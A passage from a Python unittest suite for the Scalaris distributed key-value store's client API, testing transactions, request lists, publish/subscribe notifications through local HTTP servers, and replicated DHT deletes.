self.fail('The write should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
class TestTransaction(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for Transaction()
def testTransaction1(self):
t = Transaction()
t.close_connection()
# Test method for Transaction(conn)
def testTransaction3(self):
t = Transaction(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
t.close_connection()
# Test method for Transaction.close_connection() trying to close the connection twice.
def testDoubleClose(self):
t = Transaction()
t.close_connection()
t.close_connection()
# Test method for Transaction.commit() with a closed connection.
def testCommit_NotConnected(self):
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.commit)
t.commit()
t.close_connection()
# Test method for Transaction.commit() which commits an empty transaction.
def testCommit_Empty(self):
t = Transaction()
t.commit()
t.close_connection()
# Test method for Transaction.abort() with a closed connection.
def testAbort_NotConnected(self):
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.abort)
t.abort()
t.close_connection()
# Test method for Transaction.abort() which aborts an empty transaction.
def testAbort_Empty(self):
t = Transaction()
t.abort()
t.close_connection()
# Test method for Transaction.read(key)
def testRead_NotFound(self):
key = "_Read_NotFound"
t = Transaction()
self.assertRaises(scalaris.NotFoundError, t.read, str(self._testTime) + key)
t.close_connection()
# Test method for Transaction.read(key) with a closed connection.
def testRead_NotConnected(self):
key = "_Read_NotConnected"
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.read, str(self._testTime) + key)
self.assertRaises(scalaris.NotFoundError, t.read, str(self._testTime) + key)
t.close_connection()
# Test method for Transaction.write(key, value=str()) with a closed connection.
def testWriteString_NotConnected(self):
key = "_WriteString_NotConnected"
t = Transaction()
t.close_connection()
#self.assertRaises(scalaris.ConnectionError, t.write, str(self._testTime) + key, _TEST_DATA[0])
t.write(str(self._testTime) + key, _TEST_DATA[0])
t.close_connection()
# Test method for Transaction.read(key) and Transaction.write(key, value=str())
# which should show that writing a value for a key for which a previous read
# returned a NotFoundError is possible.
def testWriteString_NotFound(self):
key = "_WriteString_notFound"
t = Transaction()
notFound = False
try:
t.read(str(self._testTime) + key)
except scalaris.NotFoundError:
notFound = True
self.assertTrue(notFound)
t.write(str(self._testTime) + key, _TEST_DATA[0])
self.assertEqual(t.read(str(self._testTime) + key), _TEST_DATA[0])
t.close_connection()
# Test method for Transaction.write(key, value=str()) and Transaction.read(key).
# Writes strings and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteString(self):
key = "_testWriteString1_"
t = Transaction()
for i in xrange(len(_TEST_DATA)):
t.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to read the data:
for i in xrange(len(_TEST_DATA)):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
for i in xrange(len(_TEST_DATA)):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, _TEST_DATA[i])
t.close_connection()
# Test method for Transaction.write(key, value=list()) and Transaction.read(key).
# Writes a list and uses a distinct key for each value. Tries to read the data afterwards.
def testWriteList1(self):
key = "_testWriteList1_"
t = scalaris.Transaction()
for i in xrange(0, len(_TEST_DATA) - 1, 2):
t.write(str(self._testTime) + key + str(i), [_TEST_DATA[i], _TEST_DATA[i + 1]])
# now try to read the data:
for i in xrange(0, len(_TEST_DATA), 2):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
t.close_connection()
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
for i in xrange(0, len(_TEST_DATA), 2):
actual = t.read(str(self._testTime) + key + str(i))
self.assertEqual(actual, [_TEST_DATA[i], _TEST_DATA[i + 1]])
t.close_connection()
# Test method for Transaction.req_list(RequestList) with an
# empty request list.
def testReqList_Empty(self):
conn = Transaction()
conn.req_list(conn.new_req_list())
conn.close_connection()
# Test method for Transaction.req_list(RequestList) with a
# mixed request list.
def testReqList1(self):
key = "_ReqList1_"
conn = Transaction()
readRequests = conn.new_req_list()
firstWriteRequests = conn.new_req_list()
writeRequests = conn.new_req_list()
for i in xrange(0, len(_TEST_DATA)):
if (i % 2) == 0:
firstWriteRequests.add_write(str(self._testTime) + key + str(i), _TEST_DATA[i])
writeRequests.add_write(str(self._testTime) + key + str(i), _TEST_DATA[i])
readRequests.add_read(str(self._testTime) + key + str(i))
results = conn.req_list(firstWriteRequests)
# evaluate the first write results:
for i in xrange(0, firstWriteRequests.size()):
conn.process_result_write(results[i])
requests = conn.new_req_list(readRequests).extend(writeRequests).add_commit()
results = conn.req_list(requests)
self.assertEqual(requests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
if (i % 2) == 0:
actual = conn.process_result_read(results[i])
self.assertEqual(_TEST_DATA[i], actual)
else:
try:
conn.process_result_read(results[i])
# a not found exception must be thrown
self.fail('expected a NotFoundError')
except scalaris.NotFoundError:
pass
# now evaluate the write results:
for i in xrange(0, writeRequests.size()):
pos = readRequests.size() + i
conn.process_result_write(results[pos])
# once again test reads - now all reads should be successful
results = conn.req_list(readRequests)
self.assertEqual(readRequests.size(), len(results))
# now evaluate the read results:
for i in xrange(0, readRequests.size()):
actual = conn.process_result_read(results[i])
self.assertEqual(_TEST_DATA[i], actual)
conn.close_connection();
# Test method for Transaction.write(key, value=bytearray()) with a
# request that is too large.
def testReqTooLarge(self):
conn = Transaction()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.write(str(self._testTime) + key, data)
self.fail('The write should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
# Various tests.
def testVarious(self):
self._writeSingleTest("_0:\u0160arplaninac:page_", _TEST_DATA[0])
# Helper function for single write tests.
# Writes a strings to some key and tries to read it afterwards.
def _writeSingleTest(self, key, data):
t = Transaction()
t.write(str(self._testTime) + key, data)
# now try to read the data:
self.assertEqual(t.read(str(self._testTime) + key), data)
# commit the transaction and try to read the data with a new one:
t.commit()
t = Transaction()
self.assertEqual(t.read(str(self._testTime) + key), data)
t.close_connection()
class TestPubSub(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# checks if there are more elements in list than in expectedElements and returns one of those elements
@staticmethod
def _getDiffElement(mylist, expectedElements):
for e in expectedElements:
mylist.remove(e)
if len(mylist) > 0:
return mylist[0]
else:
return None
# Test method for PubSub()
def testPubSub1(self):
conn = PubSub()
conn.close_connection()
# Test method for PubSub(conn)
def testPubSub2(self):
conn = PubSub(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
conn.close_connection()
# Test method for PubSub.close_connection() trying to close the connection twice.
def testDoubleClose(self):
conn = PubSub()
conn.close_connection()
conn.close_connection()
# Test method for PubSub.publish(topic, content) with a closed connection.
def testPublish_NotConnected(self):
topic = "_Publish_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.publish, str(self._testTime) + topic, _TEST_DATA[0])
conn.publish(str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.publish(topic, content).
# Publishes some topics and uses a distinct key for each value.
def testPublish1(self):
topic = "_Publish1_"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.publish(str(self._testTime) + topic + str(i), _TEST_DATA[i])
conn.close_connection()
# Test method for PubSub.publish(topic, content).
# Publishes some topics and uses a single key for all the values.
def testPublish2(self):
topic = "_Publish2"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.publish(str(self._testTime) + topic, _TEST_DATA[i])
conn.close_connection()
# Test method for PubSub.get_subscribers(topic) with a closed connection.
def testGetSubscribersOtp_NotConnected(self):
topic = "_GetSubscribers_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.get_subscribers, str(self._testTime) + topic)
conn.get_subscribers(str(self._testTime) + topic)
conn.close_connection()
# Test method for PubSub.get_subscribers(topic).
# Tries to get a subscriber list from an empty topic.
def testGetSubscribers_NotExistingTopic(self):
topic = "_GetSubscribers_NotExistingTopic"
conn = PubSub()
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertEqual(subscribers, [])
conn.close_connection()
# Test method for PubSub.subscribe(topic url) with a closed connection.
def testSubscribe_NotConnected(self):
topic = "_Subscribe_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.subscribe, str(self._testTime) + topic, _TEST_DATA[0])
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.subscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a distinct topic for each URL.
def testSubscribe1(self):
topic = "_Subscribe1_"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# check if the subscribers were successfully saved:
for i in xrange(len(_TEST_DATA)):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 1,
msg = "Subscribers of topic (" + topic1 + ") should only be [" + _TEST_DATA[i] + "], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic, url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a single topic for all URLs.
def testSubscribe2(self):
topic = "_Subscribe2"
conn = PubSub()
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[i])
# check if the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
for i in xrange(len(_TEST_DATA)):
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic + "\"")
self.assertEqual(self._getDiffElement(subscribers, _TEST_DATA), None,
msg = "unexpected subscriber of topic \"" + topic + "\"")
conn.close_connection()
# Test method for PubSub.unsubscribe(topic url) with a closed connection.
def testUnsubscribe_NotConnected(self):
topic = "_Unsubscribe_NotConnected"
conn = PubSub()
conn.close_connection()
#self.assertRaises(scalaris.ConnectionError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
conn.close_connection()
# Test method for PubSub.unsubscribe(topic url) and PubSub.get_subscribers(topic).
# Tries to unsubscribe an URL from a non-existing topic and tries to get the subscriber list afterwards.
def testUnsubscribe_NotExistingTopic(self):
topic = "_Unsubscribe_NotExistingTopic"
conn = PubSub()
# unsubscribe test "url":
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[0])
# check whether the unsubscribed urls were unsubscribed:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertFalse(_TEST_DATA[0] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[0] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(len(subscribers), 0,
msg = "Subscribers of topic (" + topic + ") should only be [], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic url), PubSub.unsubscribe(topic url) and PubSub.get_subscribers(topic).
# Tries to unsubscribe an unsubscribed URL from an existing topic and compares the subscriber list afterwards.
def testUnsubscribe_NotExistingUrl(self):
topic = "_Unsubscribe_NotExistingUrl"
conn = PubSub()
# first subscribe test "urls"...
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[0])
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[1])
# then unsubscribe another "url":
self.assertRaises(scalaris.NotFoundError, conn.unsubscribe, str(self._testTime) + topic, _TEST_DATA[2])
# check whether the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
self.assertTrue(_TEST_DATA[0] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[0] + "\" does not exist for topic \"" + topic + "\"")
self.assertTrue(_TEST_DATA[1] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[1] + "\" does not exist for topic \"" + topic + "\"")
# check whether the unsubscribed urls were unsubscribed:
self.assertFalse(_TEST_DATA[2] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[2] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(len(subscribers), 2,
msg = "Subscribers of topic (" + topic + ") should only be [\"" + _TEST_DATA[0] + "\", \"" + _TEST_DATA[1] + "\"], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic url), PubSub.unsubscribe(topic url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a distinct topic for each URL.
# Unsubscribes every second subscribed URL.
def testUnsubscribe1(self):
topic = "_UnsubscribeString1_"
conn = PubSub()
# first subscribe test "urls"...
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# ... then unsubscribe every second url:
for i in xrange(0, len(_TEST_DATA), 2):
conn.unsubscribe(str(self._testTime) + topic + str(i), _TEST_DATA[i])
# check whether the subscribers were successfully saved:
for i in xrange(1, len(_TEST_DATA), 2):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 1,
msg = "Subscribers of topic (" + topic1 + ") should only be [\"" + _TEST_DATA[i] + "\"], but is: " + repr(subscribers))
# check whether the unsubscribed urls were unsubscribed:
for i in xrange(0, len(_TEST_DATA), 2):
topic1 = topic + str(i)
subscribers = conn.get_subscribers(str(self._testTime) + topic1)
self.assertFalse(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" should have been unsubscribed from topic \"" + topic1 + "\"")
self.assertEqual(len(subscribers), 0,
msg = "Subscribers of topic (" + topic1 + ") should only be [], but is: " + repr(subscribers))
conn.close_connection()
# Test method for PubSub.subscribe(topic url), PubSub.unsubscribe(topic url) and PubSub.get_subscribers(topic).
# Subscribes some arbitrary URLs to arbitrary topics and uses a single topic for all URLs.
# Unsubscribes every second subscribed URL.
def testUnsubscribe2(self):
topic = "_UnubscribeString2"
conn = PubSub()
# first subscribe all test "urls"...
for i in xrange(len(_TEST_DATA)):
conn.subscribe(str(self._testTime) + topic, _TEST_DATA[i])
# ... then unsubscribe every second url:
for i in xrange(0, len(_TEST_DATA), 2):
conn.unsubscribe(str(self._testTime) + topic, _TEST_DATA[i])
# check whether the subscribers were successfully saved:
subscribers = conn.get_subscribers(str(self._testTime) + topic)
subscribers_expected = []
for i in xrange(1, len(_TEST_DATA), 2):
subscribers_expected.append(_TEST_DATA[i])
self.assertTrue(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" does not exist for topic \"" + topic + "\"")
# check whether the unsubscribed urls were unsubscribed:
for i in xrange(0, len(_TEST_DATA), 2):
self.assertFalse(_TEST_DATA[i] in subscribers,
msg = "Subscriber \"" + _TEST_DATA[i] + "\" should have been unsubscribed from topic \"" + topic + "\"")
self.assertEqual(self._getDiffElement(subscribers, subscribers_expected), None,
msg = "unexpected subscriber of topic \"" + topic + "\"")
conn.close_connection()
def _checkNotifications(self, notifications, expected):
not_received = []
unrelated_items = []
unrelated_topics = []
for (topic, contents) in expected.items():
if topic not in notifications:
notifications[topic] = []
for content in contents:
if not content in notifications[topic]:
not_received.append(topic + ": " + content)
notifications[topic].remove(content)
if len(notifications[topic]) > 0:
unrelated_items.append("(" + topic + ": " + ", ".join(notifications[topic]) + ")")
del notifications[topic]
# is there another (unexpected) topic we received content for?
if len(notifications) > 0:
for (topic, contents) in notifications.items():
if len(contents) > 0:
unrelated_topics.append("(" + topic + ": " + ", ".join(contents) + ")")
break
fail_msg = "not received: " + ", ".join(not_received) + "\n" +\
"unrelated items: " + ", ".join(unrelated_items) + "\n" +\
"unrelated topics: " + ", ".join(unrelated_topics)
self.assertTrue(len(not_received) == 0 and len(unrelated_items) == 0
and len(unrelated_topics) == 0, fail_msg)
# Test method for the publish/subscribe system.
# Single server, subscription to one topic, multiple publishs.
def testSubscription1(self):
topic = str(self._testTime) + "_Subscription1"
conn = PubSub()
server1 = self._newSubscriptionServer()
notifications_server1_expected = {topic: []}
ip1, port1 = server1.server_address
conn.subscribe(topic, 'http://' + str(ip1) + ':' + str(port1))
for i in xrange(len(_TEST_DATA)):
conn.publish(topic, _TEST_DATA[i])
notifications_server1_expected[topic].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if topic not in server1.notifications or len(server1.notifications[topic]) < len(notifications_server1_expected[topic]):
time.sleep(1)
else:
break
server1.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
# Three servers, subscription to one topic, multiple publishs.
def testSubscription2(self):
topic = str(self._testTime) + "_Subscription2"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic: []}
notifications_server2_expected = {topic: []}
notifications_server3_expected = {topic: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic, 'http://' + str(ip3) + ':' + str(port3))
for i in xrange(len(_TEST_DATA)):
conn.publish(topic, _TEST_DATA[i])
notifications_server1_expected[topic].append(_TEST_DATA[i])
notifications_server2_expected[topic].append(_TEST_DATA[i])
notifications_server3_expected[topic].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic not in server1.notifications or len(server1.notifications[topic]) < len(notifications_server1_expected[topic])) or \
(topic not in server2.notifications or len(server2.notifications[topic]) < len(notifications_server2_expected[topic])) or \
(topic not in server3.notifications or len(server3.notifications[topic]) < len(notifications_server3_expected[topic])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
# Three servers, subscription to different topics, multiple publishs, each
# server receives a different number of elements.
def testSubscription3(self):
topic1 = str(self._testTime) + "_Subscription3_1"
topic2 = str(self._testTime) + "_Subscription3_2"
topic3 = str(self._testTime) + "_Subscription3_3"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic1: []}
notifications_server2_expected = {topic2: []}
notifications_server3_expected = {topic3: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic1, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic3, 'http://' + str(ip3) + ':' + str(port3))
for i in xrange(0, len(_TEST_DATA), 2):
conn.publish(topic1, _TEST_DATA[i])
notifications_server1_expected[topic1].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 3):
conn.publish(topic2, _TEST_DATA[i])
notifications_server2_expected[topic2].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 5):
conn.publish(topic3, _TEST_DATA[i])
notifications_server3_expected[topic3].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic1 not in server1.notifications or len(server1.notifications[topic1]) < len(notifications_server1_expected[topic1])) or \
(topic2 not in server2.notifications or len(server2.notifications[topic2]) < len(notifications_server2_expected[topic2])) or \
(topic3 not in server3.notifications or len(server3.notifications[topic3]) < len(notifications_server3_expected[topic3])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
# Test method for the publish/subscribe system.
# Like testSubscription3() but some subscribed urls will be unsubscribed.
def testSubscription4(self):
topic1 = str(self._testTime) + "_Subscription4_1"
topic2 = str(self._testTime) + "_Subscription4_2"
topic3 = str(self._testTime) + "_Subscription4_3"
conn = PubSub()
server1 = self._newSubscriptionServer()
server2 = self._newSubscriptionServer()
server3 = self._newSubscriptionServer()
notifications_server1_expected = {topic1: []}
notifications_server2_expected = {topic2: []}
notifications_server3_expected = {topic3: []}
ip1, port1 = server1.server_address
ip2, port2 = server2.server_address
ip3, port3 = server3.server_address
conn.subscribe(topic1, 'http://' + str(ip1) + ':' + str(port1))
conn.subscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
conn.subscribe(topic3, 'http://' + str(ip3) + ':' + str(port3))
conn.unsubscribe(topic2, 'http://' + str(ip2) + ':' + str(port2))
for i in xrange(0, len(_TEST_DATA), 2):
conn.publish(topic1, _TEST_DATA[i])
notifications_server1_expected[topic1].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 3):
conn.publish(topic2, _TEST_DATA[i])
# note: topic2 is unsubscribed
# notifications_server2_expected[topic2].append(_TEST_DATA[i])
for i in xrange(0, len(_TEST_DATA), 5):
conn.publish(topic3, _TEST_DATA[i])
notifications_server3_expected[topic3].append(_TEST_DATA[i])
# wait max '_NOTIFICATIONS_TIMEOUT' seconds for notifications:
for i in xrange(_NOTIFICATIONS_TIMEOUT):
if (topic1 not in server1.notifications or len(server1.notifications[topic1]) < len(notifications_server1_expected[topic1])) or \
(topic3 not in server3.notifications or len(server3.notifications[topic3]) < len(notifications_server3_expected[topic3])):
time.sleep(1)
else:
break
server1.shutdown()
server2.shutdown()
server3.shutdown()
# check that every notification arrived:
self._checkNotifications(server1.notifications, notifications_server1_expected)
self._checkNotifications(server2.notifications, notifications_server2_expected)
self._checkNotifications(server3.notifications, notifications_server3_expected)
conn.close_connection()
@staticmethod
def _newSubscriptionServer(server_address = ('localhost', 0)):
server = TestPubSub.SubscriptionServer(server_address)
#ip, port = server.server_address
# Start a thread with the server
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.setDaemon(True)
server_thread.start()
#print "Server loop running in thread:", server_thread.getName()
server.waitForStart()
return server
class SubscriptionServer(HTTPServer):
def __init__(self, server_address):
HTTPServer.__init__(self, server_address, TestPubSub.SubscriptionHandler)
self.notifications = {}
def checkPortOccupied(self):
"""Checks if the chosen port is in use."""
if (self.server_port == 0):
return False
# try to connect to the http server's socket to test whether it is up
for (family, socktype, proto, _canonname, _sockaddr) in \
socket.getaddrinfo(self.server_name, self.server_port, 0, socket.SOCK_STREAM):
s = None
try:
s = socket.socket(family, socktype, proto)
s.settimeout(1.0)
s.connect((self.server_name, self.server_port))
s.close()
return True
except:
if s:
s.close()
return False
def waitForStart(self):
# wait until port is occupied:
for _i in xrange(10): # 1s timeout in socket connect + 0.1 here => 11s total timeout
if self.checkPortOccupied():
return
else:
time.sleep(.1)
msg = "Port %s not bound on %s" % (repr(self.server_port), repr(self.server_name))
raise IOError(msg)
class SubscriptionHandler(BaseHTTPRequestHandler):
def do_POST(self):
if 'content-length' in self.headers and 'content-type' in self.headers:
length = int(self.headers['content-length'])
charset = self.headers['content-type'].split('charset=')
if (len(charset) > 1):
encoding = charset[-1]
else:
encoding = 'utf-8'
data = self.rfile.read(length).decode(encoding)
response_json = json.loads(data)
# {"method":"notify","params":["1209386211287_SubscribeTest","content"],"id":482975}
if 'method' in response_json and response_json['method'] == 'notify' \
and 'params' in response_json and 'id' in response_json \
and isinstance(response_json['params'], list) and len(response_json['params']) == 2:
topic = response_json['params'][0]
content = response_json['params'][1]
if hasattr(self.server, 'notifications'):
if topic not in self.server.notifications:
self.server.notifications[topic] = []
self.server.notifications[topic].append(content)
else:
pass
response = '{}'.encode('utf-8')
self.send_response(200)
self.send_header("Content-type", "text/html; charset=utf-8")
self.send_header("Content-length", str(len(response)))
self.end_headers()
self.wfile.write(response)
# to disable logging
def log_message(self, *args):
pass
# Test method for PubSub.publish(key, value=bytearray()) with a
# request that is too large.
def testReqTooLarge(self):
conn = PubSub()
data = ''.join('0' for _x in xrange(_TOO_LARGE_REQUEST_SIZE))
key = "_ReqTooLarge"
try:
conn.publish(str(self._testTime) + key, data)
self.fail('The publish should have failed unless yaws_max_post_data was set larger than ' + str(_TOO_LARGE_REQUEST_SIZE))
except scalaris.ConnectionError:
pass
conn.close_connection()
class TestReplicatedDHT(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for ReplicatedDHT()
def testReplicatedDHT1(self):
rdht = ReplicatedDHT()
rdht.close_connection()
# Test method for ReplicatedDHT(conn)
def testReplicatedDHT2(self):
rdht = ReplicatedDHT(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
rdht.close_connection()
# Test method for ReplicatedDHT.close_connection() trying to close the connection twice.
def testDoubleClose(self):
rdht = ReplicatedDHT()
rdht.close_connection()
rdht.close_connection()
# Tries to read the value at the given key and fails if this does
# not fail with a NotFoundError.
def _checkKeyDoesNotExist(self, key):
conn = scalaris.TransactionSingleOp()
try:
conn.read(key)
self.fail('the value at ' + key + ' should not exist anymore')
except scalaris.NotFoundError:
# nothing to do here
pass
conn.close_connection()
# Test method for ReplicatedDHT.delete(key).
# Tries to delete some not existing keys.
def testDelete_notExistingKey(self):
key = "_Delete_NotExistingKey"
rdht = ReplicatedDHT()
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
rdht.close_connection()
# Test method for ReplicatedDHT.delete(key) and TransactionSingleOp#write(key, value=str()).
# Inserts some values, tries to delete them afterwards and tries the delete again.
def testDelete1(self):
key = "_Delete1"
c = scalaris.JSONConnection(url = scalaris.DEFAULT_URL)
rdht = ReplicatedDHT(conn = c)
sc = scalaris.TransactionSingleOp(conn = c)
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
# try again (should be successful with 0 deletes)
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
c.close()
# Test method for ReplicatedDHT.delete(key) and TransactionSingleOp#write(key, value=str()).
# Inserts some values, tries to delete them afterwards, inserts them again and tries to delete them again (twice).
def testDelete2(self):
key = "_Delete2"
c = scalaris.JSONConnection(url = scalaris.DEFAULT_URL)
rdht = ReplicatedDHT(conn = c)
sc = scalaris.TransactionSingleOp(conn = c)
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
for i in xrange(len(_TEST_DATA)):
sc.write(str(self._testTime) + key + str(i), _TEST_DATA[i])
# now try to delete the data:
for i in xrange(len(_TEST_DATA)):
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 4)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (4, 0, 0))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
# try again (should be successful with 0 deletes)
ok = rdht.delete(str(self._testTime) + key + str(i))
self.assertEqual(ok, 0)
results = rdht.get_last_delete_result()
self.assertEqual((results.ok, results.locks_set, results.undefined), (0, 0, 4))
self._checkKeyDoesNotExist(str(self._testTime) + key + str(i))
c.close()
class TestScalarisVM(unittest.TestCase):
def setUp(self):
# The time when the test suite was started.
now = datetime.now()
# This is used to create different erlang keys for each run.
self._testTime = int(time.mktime(now.timetuple()) * 1000 + (now.microsecond / 1000.0))
# Test method for ScalarisVM()
def testScalarisVM1(self):
rdht = ScalarisVM()
rdht.close_connection()
